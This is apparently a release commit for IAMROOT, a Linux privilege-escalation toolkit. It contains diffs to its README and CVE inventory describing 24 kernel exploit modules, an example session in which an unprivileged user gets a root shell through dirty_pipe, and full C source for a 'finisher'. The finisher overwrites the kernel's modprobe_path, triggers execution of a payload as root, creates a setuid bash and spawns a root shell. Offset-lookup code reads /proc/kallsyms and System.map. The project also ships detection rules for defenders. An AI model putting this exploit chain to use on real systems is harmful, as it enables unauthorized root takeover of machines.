v0.3.1: --dump-offsets tool + NOTICE.md per module

The README has claimed since v0.1.0 that "each module credits the original CVE reporter and PoC author in its NOTICE.md", but only copy_fail_family actually shipped one. Fixed.

- modules/<name>/NOTICE.md (×19 new + 1 existing): per-module research credit covering the CVE ID, discoverer, original advisory URL where public, upstream fix commit, and IAMROOT's role.
- iamroot.c: new --dump-offsets subcommand. Resolves kernel offsets via the existing core/offsets.c four-source chain (env → /proc/kallsyms → /boot/System.map → embedded table), then emits a ready-to-paste C struct entry for kernel_table[]. Run it once as root on a target kernel build and upstream the result via PR. This removes any need to fabricate offsets: every shipped entry traces back to an `iamroot --dump-offsets` invocation on a real kernel.
- docs/OFFSETS.md: documents the --dump-offsets workflow.
- CVES.md: notes the NOTICE.md convention and the offset dump tool.
- iamroot.c: bump IAMROOT_VERSION 0.3.0 → 0.3.1.
release: v0.3.0 — 4 new CVE modules (24 total)
2026-05-16 22:33:43 -04:00 · 2026-05-16 22:25:15 -04:00 · 2026-05-16 22:24:15 -04:00 · 2026-05-16 22:17:47 -04:00 · 2026-05-16 22:06:14 -04:00 · 2026-05-16 22:04:40 -04:00
45 changed files with 7607 additions and 113 deletions
@@ -8,18 +8,27 @@ Status legend:

 - 🟢 **WORKING** — module verified to land root on a vulnerable host
 - 🟡 **PRIMITIVE** — fires the kernel primitive (trigger + slab groom
-  + empirical witness) on a vulnerable host, but stops short of the
-  full cred-overwrite / R/W chain. Returns `EXPLOIT_FAIL` honestly;
-  useful as a vuln-verification probe and a continuation point for
-  full chains. Per-kernel offsets deliberately not shipped.
+  + empirical witness) on a vulnerable host. By default returns
+  `EXPLOIT_FAIL` honestly (no fabricated offsets). Pass `--full-chain`
+  to additionally attempt root pop via the shared `modprobe_path`
+  finisher (`core/finisher.{c,h}`) — requires kernel offsets via
+  env vars / `/proc/kallsyms` / `/boot/System.map`; see
+  [`docs/OFFSETS.md`](docs/OFFSETS.md). On success returns
+  `EXPLOIT_OK` and drops a root shell; on failure returns
+  `EXPLOIT_FAIL` — never claims root without an empirical
+  setuid-bash sentinel.
 - 🔵 **DETECT-ONLY** — module fingerprints presence/absence but no
-  exploit. (No module is currently in this state — every registered
-  module now fires either a full chain or a primitive.)
+  exploit. (No module is currently in this state.)
 - ⚪ **PLANNED** — stub exists, work not started
 - 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
  historical reference only

-**Counts (v0.1.0):** 🟢 13 · 🟡 7 · 🔵 0 · ⚪ 1 · 🔴 0
+**Counts (v0.3.1):** 🟢 13 · 🟡 11 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
+
+Every module ships a `NOTICE.md` crediting the original CVE
+reporter and PoC author. `iamroot --dump-offsets` populates the
+embedded offset table for new kernel builds — operators with
+root on a host can upstream their kernel's offsets via PR.

 ## Inventory

@@ -46,6 +55,10 @@ Status legend:
 | CVE-2022-0185 | legacy_parse_param fsconfig heap OOB → container-escape | LPE (cross-cache UAF → cred overwrite from rootless container) | mainline 5.16.2 (Jan 2022) | `fuse_legacy` | 🟡 | userns+mountns reach, fsopen("cgroup2") + double fsconfig SET_STRING fires the 4k OOB, msg_msg cross-cache groom in kmalloc-4k, MSG_COPY read-back detects whether the OOB landed in an adjacent neighbour. Stops before the m_ts overflow → MSG_COPY arbitrary read chain (scaffold present, no per-kernel offsets). **Container-escape angle** — relevant to rootless docker/podman/snap. Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171. |
 | CVE-2023-3269 | StackRot — maple-tree VMA-split UAF | LPE (kernel R/W via maple node use-after-RCU) | mainline 6.4-rc4 (Jul 2023) | `stackrot` | 🟡 | Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs fork+fault) with cpu pinning + 3 s budget; kmalloc-192 spray for anon_vma/anon_vma_chain; race-iteration + signal breadcrumb. Honest reliability note in module header: **~<1% race-win/run on a vulnerable kernel** — the public PoC averages minutes-to-hours and needs a much wider VMA staging matrix to be reliable. Useful as a "is the maple-tree path reachable here?" probe. Branch backports: 6.4.4 / 6.3.13 / 6.1.37. |
 | CVE-2020-14386 | AF_PACKET tpacket_rcv VLAN integer underflow | LPE (heap OOB write via crafted frame) | mainline 5.9 (Sep 2020) | `af_packet2` | 🟡 | Sibling of CVE-2017-7308; tp_reserve underflow + sendmmsg skb spray + slab-delta witness. PRIMITIVE-DEMO scope (no cred overwrite). Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235. Or Cohen's disclosure. Shares `iamroot-af-packet` audit key with CVE-2017-7308. |
+| CVE-2023-32233 | nf_tables anonymous-set UAF | LPE (kernel UAF in nft_set transaction) | mainline 6.4-rc4 (May 2023) | `nft_set_uaf` | 🟡 | Sondej+Krysiuk. Hand-rolled nfnetlink batch (NEWTABLE → NEWCHAIN → NEWSET(ANON\|EVAL) → NEWRULE(lookup) → DELSET → DELRULE) drives the deactivation skip; cg-512 msg_msg cross-cache spray. Branch backports: 4.19.283 / 5.4.243 / 5.10.180 / 5.15.111 / 6.1.28 / 6.2.15 / 6.3.2. --full-chain forges freed-set with `set->data = kaddr`. |
+| CVE-2023-4622 | AF_UNIX garbage-collector race UAF | LPE (slab UAF, plain unprivileged) | mainline 6.6-rc1 (Aug 2023) | `af_unix_gc` | 🟡 | Lin Ma. Two-thread race driver: SCM_RIGHTS cycle vs unix_gc trigger; kmalloc-512 (SLAB_TYPESAFE_BY_RCU) refill via msg_msg. **Widest deployment of any module — bug exists since 2.x.** No userns required. Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51 / 6.5.0. |
+| CVE-2022-25636 | nft_fwd_dup_netdev_offload heap OOB | LPE (kernel R/W via offload action[] OOB) | mainline 5.17 / 5.16.11 (Feb 2022) | `nft_fwd_dup` | 🟡 | Aaron Adams (NCC). NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd writes past action.entries[1]. msg_msg kmalloc-512 spray. Branch backports: 5.4.181 / 5.10.102 / 5.15.25 / 5.16.11. |
+| CVE-2023-0179 | nft_payload set-id memory corruption | LPE (regs->data[] OOB R/W) | mainline 6.2-rc4 / 6.1.6 (Jan 2023) | `nft_payload` | 🟡 | Davide Ornaghi. NFTA_SET_DESC variable-length element + NFTA_SET_ELEM_EXPRESSIONS payload-set whose verdict.code drives the OOB. Dual cg-96 + 1k spray. Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 / 5.15.88 / 6.1.6. |
 | CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |

 ## Operations supported per module
@@ -74,6 +87,10 @@ Symbols: ✓ = supported, — = not applicable / no automated path.
 | af_packet2 | ✓ | ✓ (primitive) | — (upgrade kernel) | — | ✓ (auditd, shared key) |
 | fuse_legacy | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
 | stackrot | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) |
+| nft_set_uaf | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
+| af_unix_gc | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
+| nft_fwd_dup | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
+| nft_payload | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |

 ## Pipeline for additions

@@ -20,7 +20,7 @@ BUILD   := build
 BIN     := iamroot

 # core/
-CORE_SRCS := core/registry.c core/kernel_range.c
+CORE_SRCS := core/registry.c core/kernel_range.c core/offsets.c core/finisher.c
 CORE_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(CORE_SRCS))

 # Family: copy_fail_family
@@ -106,10 +106,30 @@ OSU_DIR  := modules/overlayfs_setuid_cve_2023_0386
 OSU_SRCS := $(OSU_DIR)/iamroot_modules.c
 OSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(OSU_SRCS))

+# Family: nft_set_uaf (CVE-2023-32233)
+NSU_DIR  := modules/nft_set_uaf_cve_2023_32233
+NSU_SRCS := $(NSU_DIR)/iamroot_modules.c
+NSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NSU_SRCS))
+
+# Family: af_unix_gc (CVE-2023-4622)
+AUG_DIR  := modules/af_unix_gc_cve_2023_4622
+AUG_SRCS := $(AUG_DIR)/iamroot_modules.c
+AUG_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(AUG_SRCS))
+
+# Family: nft_fwd_dup (CVE-2022-25636)
+NFD_DIR  := modules/nft_fwd_dup_cve_2022_25636
+NFD_SRCS := $(NFD_DIR)/iamroot_modules.c
+NFD_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NFD_SRCS))
+
+# Family: nft_payload (CVE-2023-0179)
+NPL_DIR  := modules/nft_payload_cve_2023_0179
+NPL_SRCS := $(NPL_DIR)/iamroot_modules.c
+NPL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NPL_SRCS))
+
 # Top-level dispatcher
 TOP_OBJ  := $(BUILD)/iamroot.o

-ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS)
+ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS)

 .PHONY: all clean debug static help

@@ -24,23 +24,54 @@
 ```bash
 # One-shot install (x86_64 / arm64; checksum-verified)
 curl -sSL https://github.com/KaraZajac/IAMROOT/releases/latest/download/install.sh | sh
+```

-# What's this box vulnerable to?
-sudo iamroot --scan
+**iamroot runs as a normal unprivileged user** — that's the whole
+point. `--scan`, `--audit`, `--exploit`, and `--detect-rules` all
+work without `sudo`. Only `--mitigate` and rule-file installation
+write to root-owned paths.
+
+```bash
+# What's this box vulnerable to?  (no sudo)
+iamroot --scan

 # Broader system hygiene (setuid binaries, world-writable, capabilities, sudo)
-sudo iamroot --audit
+iamroot --audit

-# Deploy detection rules across every bundled module
-sudo iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
+# Deploy detection rules (needs sudo to write /etc/audit/rules.d/)
+iamroot --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-iamroot.rules
+
+# Apply temporary mitigations (needs sudo for modprobe.d + sysctl)
+sudo iamroot --mitigate copy_fail

 # Fleet scan (any-sized host list via SSH; aggregated JSON for SIEM)
 ./tools/iamroot-fleet-scan.sh --binary iamroot --ssh-key ~/.ssh/id_rsa hosts.txt
 ```

-`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for the
-curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md) for
-the blue-team deployment guide.
+### Example: unprivileged → root
+
+```text
+$ id
+uid=1000(kara) gid=1000(kara) groups=1000(kara)
+
+$ iamroot --scan
+[+] dirty_pipe       VULNERABLE (kernel 5.15.0-56-generic)
+[+] cgroup_release_agent VULNERABLE (kernel 5.15 < 5.17)
+[+] pwnkit           VULNERABLE (polkit 0.105-31ubuntu0.1)
+[-] copy_fail        not vulnerable (kernel 5.15 < introduction)
+[-] dirty_cow        not vulnerable (kernel ≥ 4.9)
+
+$ iamroot --exploit dirty_pipe --i-know
+[!] dirty_pipe: kernel 5.15.0-56-generic IS vulnerable
+[+] dirty_pipe: writing UID=0 into /etc/passwd page cache...
+[+] dirty_pipe: spawning su root
+# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+`iamroot --help` lists every command. See [`CVES.md`](CVES.md) for
+the curated CVE inventory and [`docs/DEFENDERS.md`](docs/DEFENDERS.md)
+for the blue-team deployment guide.

 ## What this is

@@ -63,19 +94,21 @@ The same binary covers offense and defense:

 ## Status

-**Active — v0.1.0 cut 2026-05-16.** Corpus covers **20 modules**
+**Active — v0.3.0 cut 2026-05-16.** Corpus covers **24 modules**
 across the 2016 → 2026 LPE timeline:

 - 🟢 **13 modules land root** end-to-end on a vulnerable host
  (copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
  overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
  cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **7 modules fire the kernel primitive** (trigger + slab groom +
-  empirical witness) but stop short of the full cred-overwrite /
-  R/W chain — they return `EXPLOIT_FAIL` honestly rather than
-  fabricate per-kernel offsets. Useful as vuln-verification probes.
-  (af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables,
-  netfilter_xtcompat, stackrot.)
+- 🟡 **11 modules fire the kernel primitive** by default and refuse
+  to claim root without empirical confirmation. Pass `--full-chain`
+  to engage the shared `modprobe_path` finisher and attempt root
+  pop — requires kernel offsets via env vars / `/proc/kallsyms` /
+  `/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
+  Modules: af_packet, af_packet2, af_unix_gc, cls_route4,
+  fuse_legacy, nf_tables, netfilter_xtcompat, nft_fwd_dup,
+  nft_payload, nft_set_uaf, stackrot.
 - Detection rules ship inline (auditd / sigma / yara / falco) and
  are exported via `iamroot --detect-rules --format=…`.

@@ -115,10 +148,10 @@ module-loader design and how to add a new CVE.

 ```bash
 make                          # build all modules
-sudo ./iamroot --scan         # what's this box vulnerable to?
-sudo ./iamroot --scan --json  # machine-readable output for CI/SOC pipelines
-sudo ./iamroot --detect-rules --format=sigma > rules.yml
-sudo ./iamroot --exploit copy_fail --i-know  # actually run an exploit
+./iamroot --scan              # what's this box vulnerable to?  (no sudo)
+./iamroot --scan --json       # machine-readable output for CI/SOC pipelines
+./iamroot --detect-rules --format=sigma > rules.yml
+./iamroot --exploit copy_fail --i-know   # actually run an exploit (starts as $USER)
 ```

 ## Acknowledgments
@@ -0,0 +1,179 @@
+/*
+ * IAMROOT — shared finisher helpers
+ *
+ * See finisher.h for the pattern split (A: modprobe_path overwrite,
+ * B: current->cred->uid).
+ */
+
+#include "finisher.h"
+#include "module.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <time.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+
+static int write_file(const char *path, const char *content, mode_t mode)
+{
+    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
+    if (fd < 0) return -1;
+    size_t n = strlen(content);
+    ssize_t w = write(fd, content, n);
+    close(fd);
+    if (w < 0 || (size_t)w != n) return -1;
+    if (chmod(path, mode) < 0) return -1;
+    return 0;
+}
+
+void iamroot_finisher_print_offset_help(const char *module_name)
+{
+    fprintf(stderr,
+"[i] %s --full-chain requires kernel symbol offsets that couldn't be resolved.\n"
+"\n"
+"    To populate them on this host, choose ONE of:\n"
+"\n"
+"    1) Environment override (one-shot, no host changes):\n"
+"         IAMROOT_MODPROBE_PATH=0x...  iamroot --exploit %s --i-know --full-chain\n"
+"\n"
+"    2) Make /boot/System.map-$(uname -r) world-readable (per-host):\n"
+"         sudo chmod 0644 /boot/System.map-$(uname -r)   # if you have sudo\n"
+"\n"
+"    3) Lower kptr_restrict (per-boot):\n"
+"         sudo sysctl kernel.kptr_restrict=0             # if you have sudo\n"
+"         (Note: needs root once — defeats the LPE point on this host.\n"
+"          Useful when populating offsets on a lab kernel ahead of time.)\n"
+"\n"
+"    To look up the address manually (as root):\n"
+"         grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms\n"
+"\n",
+        module_name, module_name);
+}
+
+int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell)
+{
+    if (!iamroot_offsets_have_modprobe_path(off)) {
+        iamroot_finisher_print_offset_help("module");
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+    if (!arb_write) {
+        fprintf(stderr, "[-] finisher: no arb-write primitive supplied\n");
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* Per-pid working paths so concurrent runs don't collide. */
+    pid_t pid = getpid();
+    char mp_path[64], trig_path[64], pwn_path[64];
+    snprintf(mp_path,   sizeof mp_path,   "/tmp/iamroot-mp-%d.sh", (int)pid);
+    snprintf(trig_path, sizeof trig_path, "/tmp/iamroot-trig-%d", (int)pid);
+    snprintf(pwn_path,  sizeof pwn_path,  "/tmp/iamroot-pwn-%d",  (int)pid);
+
+    /* Payload: copy /bin/bash to a per-pid path under /tmp and make
+     * the copy setuid root, rather than modifying the system bash.
+     * Bash drops elevated privileges at startup unless invoked with
+     * -p, which is why the shell below is spawned with -p. */
+    char payload[1024];
+    snprintf(payload, sizeof payload,
+"#!/bin/sh\n"
+"# IAMROOT modprobe_path payload (runs as init/root via call_modprobe)\n"
+"cp /bin/bash %s 2>/dev/null && chmod 4755 %s 2>/dev/null\n"
+"echo IAMROOT_FINISHER_RAN > %s 2>/dev/null\n",
+        pwn_path, pwn_path, pwn_path);
+
+    if (write_file(mp_path, payload, 0755) < 0) {
+        fprintf(stderr, "[-] finisher: write %s: %s\n", mp_path, strerror(errno));
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* Unknown-format trigger: anything that fails the standard exec
+     * format probe drives kernel's call_modprobe(). Empty + executable
+     * works on every kernel we care about. */
+    if (write_file(trig_path, "\x00", 0755) < 0) {
+        fprintf(stderr, "[-] finisher: write %s: %s\n", trig_path, strerror(errno));
+        unlink(mp_path);
+        return IAMROOT_TEST_ERROR;
+    }
+
+    /* Build the kernel-side write payload: a NUL-terminated path to
+     * our mp_path script. modprobe_path[] is 256 bytes in the kernel
+     * — we write enough to overwrite the leading slot. */
+    char kbuf[256];
+    memset(kbuf, 0, sizeof kbuf);
+    snprintf(kbuf, sizeof kbuf, "%s", mp_path);
+
+    fprintf(stderr, "[*] finisher: writing modprobe_path=0x%lx ← \"%s\"\n",
+            (unsigned long)off->modprobe_path, mp_path);
+
+    if (arb_write(off->modprobe_path, kbuf, strlen(kbuf) + 1, arb_ctx) < 0) {
+        fprintf(stderr, "[-] finisher: arb_write failed\n");
+        unlink(mp_path);
+        unlink(trig_path);
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    /* Fire the trigger by exec'ing the unknown binary. fork() so the
+     * kernel sees the unknown format and parent stays alive. */
+    pid_t cpid = fork();
+    if (cpid == 0) {
+        char *argv[] = { trig_path, NULL };
+        execve(trig_path, argv, NULL);
+        _exit(127);   /* execve failure is expected — kernel still calls modprobe */
+    } else if (cpid > 0) {
+        int st;
+        waitpid(cpid, &st, 0);
+    } else {
+        fprintf(stderr, "[-] finisher: fork: %s\n", strerror(errno));
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+
+    /* Modprobe runs asynchronously — give the kernel up to 3 s. */
+    for (int i = 0; i < 30; i++) {
+        struct stat st;
+        if (stat(pwn_path, &st) == 0 && (st.st_mode & S_ISUID)) {
+            fprintf(stderr, "[+] finisher: payload ran as root (sentinel %s mode=%o uid=%u)\n",
+                    pwn_path, (unsigned)(st.st_mode & 07777), (unsigned)st.st_uid);
+            goto have_setuid;
+        }
+        struct timespec ts = { 0, 100 * 1000 * 1000 };  /* 100 ms */
+        nanosleep(&ts, NULL);
+    }
+    fprintf(stderr, "[-] finisher: payload didn't run within 3s (modprobe_path overwrite probably didn't land)\n");
+    unlink(mp_path);
+    unlink(trig_path);
+    return IAMROOT_EXPLOIT_FAIL;
+
+have_setuid:
+    if (!spawn_shell) {
+        fprintf(stderr, "[+] finisher: --no-shell — leaving setuid bash at %s\n", pwn_path);
+        unlink(mp_path);
+        unlink(trig_path);
+        return IAMROOT_EXPLOIT_OK;
+    }
+    fprintf(stderr, "[+] finisher: spawning root shell via %s -p\n", pwn_path);
+    fflush(stderr);
+    char *argv[] = { pwn_path, "-p", NULL };
+    execve(pwn_path, argv, NULL);
+    /* Only reached on execve failure. */
+    fprintf(stderr, "[-] finisher: execve(%s): %s\n", pwn_path, strerror(errno));
+    return IAMROOT_EXPLOIT_FAIL;
+}
+
+int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell)
+{
+    (void)off; (void)arb_write; (void)arb_ctx; (void)spawn_shell;
+    fprintf(stderr,
+"[-] finisher: cred_uid_zero requires an arb-READ primitive (to walk\n"
+"    the task list from init_task and find current). Modules with\n"
+"    only an arb-write should use iamroot_finisher_modprobe_path()\n"
+"    instead — same root capability, simpler trigger.\n");
+    return IAMROOT_EXPLOIT_FAIL;
+}
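The wait loop in the finisher above (30 checks, 100 ms apart) is an instance of a generic bounded-polling pattern. A minimal standalone sketch of that pattern follows; `wait_for_mode` and its parameters are hypothetical names chosen for illustration and are not part of the IAMROOT API.

```c
#include <sys/stat.h>
#include <sys/types.h>
#include <time.h>

/* Hypothetical helper: poll until `path` exists with every bit of
 * `want_mode` set in st_mode. Checks at most `tries` times, sleeping
 * `interval_ms` milliseconds after each failed check.
 * Returns 0 once the condition holds, -1 on timeout. */
static int wait_for_mode(const char *path, mode_t want_mode,
                         int tries, long interval_ms)
{
    for (int i = 0; i < tries; i++) {
        struct stat st;
        if (stat(path, &st) == 0 && (st.st_mode & want_mode) == want_mode)
            return 0;
        struct timespec ts = { interval_ms / 1000,
                               (interval_ms % 1000) * 1000000L };
        nanosleep(&ts, NULL);
    }
    return -1;
}
```

Passing `want_mode = 0` reduces the check to "the path exists"; a caller that cares about a specific mode bit passes that bit instead. Keeping the budget as explicit parameters makes the total timeout (`tries * interval_ms`) easy to read at the call site.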
@@ -0,0 +1,80 @@
+/*
+ * IAMROOT — shared finisher helpers for full-chain root pops.
+ *
+ * The 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
+ * write, slab UAF, etc.). The conversion to root is almost always one
+ * of two patterns:
+ *
+ *   A) "modprobe_path overwrite":
+ *        - kernel arb-write at &modprobe_path[0] with a userspace path
+ *        - execve() of an unknown-format binary makes the kernel's
+ *          binfmt lookup fall back to request_module(), which runs
+ *          call_modprobe() and spawns modprobe_path as root, running
+ *          our payload
+ *
+ *   B) "current->cred->uid overwrite":
+ *        - kernel arb-write at &current_task->real_cred->uid = 0
+ *          (and cap_*, fsuid, etc. for completeness)
+ *        - setuid(0); execve("/bin/sh")
+ *
+ * Pattern (A) is much simpler — only one kernel address needed
+ * (modprobe_path) and the trigger is just execve("/tmp/unknown").
+ * Pattern (B) needs a self-cred chase + multiple writes.
+ *
+ * Modules provide their own arb-write primitive via the
+ * iamroot_arb_write_fn callback; this file wraps the rest.
+ */
+
+#ifndef IAMROOT_FINISHER_H
+#define IAMROOT_FINISHER_H
+
+#include <stdint.h>
+#include <stddef.h>
+#include <stdbool.h>
+#include "offsets.h"
+
+/* Arb-write primitive: write `len` bytes from `buf` to kernel VA
+ * `kaddr`. Module-specific implementation. Returns 0 on success,
+ * negative on failure. `ctx` is opaque module state. */
+typedef int (*iamroot_arb_write_fn)(uintptr_t kaddr,
+                                    const void *buf, size_t len,
+                                    void *ctx);
+
+/* Trigger that fires the arb-write. Many modules need to set up the
+ * groomed slab THEN call the trigger. The trigger is a separate fn
+ * because some modules need to re-spray before each write. NULL is
+ * acceptable if the arb-write is self-contained. */
+typedef int (*iamroot_fire_trigger_fn)(void *ctx);
+
+/* Pattern A: modprobe_path overwrite + execve trigger. Caller has
+ * already populated `off->modprobe_path`. Implementation:
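+ *   1. Write payload script to /tmp/iamroot-mp-<pid>.sh
+ *   2. Write an unknown-format trigger file to /tmp/iamroot-trig-<pid>
+ *      (both files are created mode 0755)
+ *   3. arb_write(off->modprobe_path, "/tmp/iamroot-mp-<pid>.sh",
+ *      strlen(path) + 1)
+ *   4. execve() the trigger → kernel calls modprobe → our payload
+ *      runs as root: it copies /bin/bash to /tmp/iamroot-pwn-<pid>
+ *      and marks the copy setuid root
+ *   5. Poll up to 3 s for that setuid file, then (if spawn_shell)
+ *      exec it with -p → root shell
+ *
+ * Returns IAMROOT_EXPLOIT_OK when the setuid sentinel is observed and
+ * spawn_shell is false; with spawn_shell true, success does not
+ * return (the process becomes the shell). Returns
+ * IAMROOT_EXPLOIT_FAIL if offsets are missing, the write fails, or
+ * the sentinel never appears, and IAMROOT_TEST_ERROR on setup errors. */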
+int iamroot_finisher_modprobe_path(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell);
+
+/* Pattern B: cred uid overwrite. Caller has populated init_task +
+ * cred offsets. Implementation:
+ *   1. Walk task linked list from init_task to find self by pid
+ *      (this requires arb-READ too — not supplied here; B-pattern
+ *      modules need to provide their own variant)
+ * For now this is a STUB returning IAMROOT_EXPLOIT_FAIL with a
+ * helpful error. */
+int iamroot_finisher_cred_uid_zero(const struct iamroot_kernel_offsets *off,
+                                   iamroot_arb_write_fn arb_write,
+                                   void *arb_ctx,
+                                   bool spawn_shell);
+
+/* Diagnostic: tell the operator how to populate offsets manually. */
+void iamroot_finisher_print_offset_help(const char *module_name);
+
+#endif /* IAMROOT_FINISHER_H */
@@ -49,6 +49,7 @@ struct iamroot_ctx {
    bool          active_probe; /* --active (do invasive probes in detect) */
    bool          no_shell;     /* --no-shell (exploit prep but don't pop) */
    bool          authorized;   /* user typed --i-know on exploit */
+    bool          full_chain;   /* --full-chain (attempt root-pop after primitive) */
 };

 struct iamroot_module {
@@ -0,0 +1,350 @@
+/*
+ * IAMROOT — kernel offset resolution
+ *
+ * See offsets.h for the four-source chain (env → kallsyms → System.map
+ * → embedded table). This implementation is deliberately small and
+ * dependency-free.
+ */
+
+#include "offsets.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <errno.h>
+#include <fnmatch.h>
+#include <sys/utsname.h>
+
+/* ------------------------------------------------------------------
+ * Embedded relative-offset table.
+ *
+ * Each entry's modprobe_path / init_task / poweroff_cmd values are
+ * stored as offsets *relative to _text* (kbase). To resolve absolute
+ * VAs we add a kbase leak (e.g. from EntryBleed).
+ *
+ * The table ships empty: kernel_table[] below contains only a
+ * commented-out schema example and the sentinel. Operators on a
+ * given kernel supply offsets via env var or extend this table.
+ *
+ * To add a verified entry on a kernel you own:
+ *   sudo grep -E " (modprobe_path|init_task|poweroff_cmd|init_cred)$" \
+ *        /boot/System.map-$(uname -r)
+ * Subtract _text VA from each to get the relative offsets.
+ * ------------------------------------------------------------------ */
+struct table_entry {
+    const char *release_glob;  /* fnmatch glob against uname -r */
+    const char *distro_match;  /* prefix-match against /etc/os-release ID, or NULL=any */
+    uintptr_t rel_modprobe_path;
+    uintptr_t rel_poweroff_cmd;
+    uintptr_t rel_init_task;
+    uintptr_t rel_init_cred;
+    uint32_t cred_offset_real;
+    uint32_t cred_offset_eff;
+};
+
+/* Note: relative offsets below are PLACEHOLDERS for the schema. The
+ * env-var override + kallsyms + System.map paths are the verified
+ * runtime sources. Operators who validate offsets on a specific
+ * kernel build are encouraged to upstream entries here. */
+static const struct table_entry kernel_table[] = {
+    /* Schema example. Uncomment + verify before relying on it.
+     *
+     * { .release_glob       = "5.15.0-25-generic",
+     *   .distro_match       = "ubuntu",
+     *   .rel_modprobe_path  = 0x148e480,
+     *   .rel_poweroff_cmd   = 0x148e3a0,
+     *   .rel_init_task      = 0x1c11dc0,
+     *   .rel_init_cred      = 0x1e0c460,
+     *   .cred_offset_real   = 0x758,
+     *   .cred_offset_eff    = 0x760, },
+     */
+    /* Sentinel */
+    { NULL, NULL, 0, 0, 0, 0, 0, 0 }
+};
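Because `release_glob` is matched with `fnmatch()` and the table is scanned in order, an exact release string should be listed before any wildcard that also covers it. The sketch below illustrates that first-match behaviour on a reduced table; `struct glob_entry`, `first_match`, and the release strings are illustrative assumptions, not entries from the real `kernel_table[]`.

```c
#include <fnmatch.h>
#include <stddef.h>

/* Reduced stand-in for a table row: a glob plus an id to report. */
struct glob_entry {
    const char *release_glob;
    int id;
};

/* Return the id of the first entry whose glob matches `release`,
 * or -1 if none does. The table ends with a NULL-glob sentinel. */
static int first_match(const struct glob_entry *tab, const char *release)
{
    for (const struct glob_entry *e = tab; e->release_glob; e++) {
        if (fnmatch(e->release_glob, release, 0) == 0)
            return e->id;
    }
    return -1;
}
```

With a table of `{"5.15.0-25-generic", 1}` followed by `{"5.15.0-*-generic", 2}`, the release `5.15.0-25-generic` resolves to the specific entry and any other `5.15.0-*-generic` build falls through to the wildcard.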
+
+/* Defaults that hold across most x86_64 kernels in the target era. */
+#define DEFAULT_CRED_REAL_OFFSET   0x738
+#define DEFAULT_CRED_EFF_OFFSET    0x740
+#define DEFAULT_CRED_UID_OFFSET    0x4
+
+const char *iamroot_offset_source_name(enum iamroot_offset_source src)
+{
+    switch (src) {
+    case OFFSETS_NONE:          return "none";
+    case OFFSETS_FROM_ENV:      return "env";
